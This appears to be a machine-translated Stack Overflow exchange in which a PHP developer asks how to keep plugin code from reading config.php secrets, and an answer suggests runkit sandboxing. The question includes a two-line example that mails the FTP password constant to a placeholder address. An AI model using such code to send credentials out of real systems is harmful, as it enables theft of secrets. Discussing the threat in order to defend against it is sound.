我正在编写一个支持使用插件的应用程序,该插件可以挂钩到管理员。
如何保护配置文件,因为目前,如果插件开发人员写道:
$msg=__FTP_PASS__;
mail("email@email","subject",$msg);
邮件与密码一起发送。我如何防止这种情况,因为这是因为我包括" config.php"在管理页面的顶部。谢谢。 #am抱歉,我不知道如何在stackoverf上格式化问题
答案 0 :(得分:0)
你可以通过某种PHP沙箱来防止这种情况(runkit' s Runkit_Sandbox类),但它不是PHP的标准部分,正确使用它并不是一件容易的事。
让用户运行任意代码永远不是一个好主意。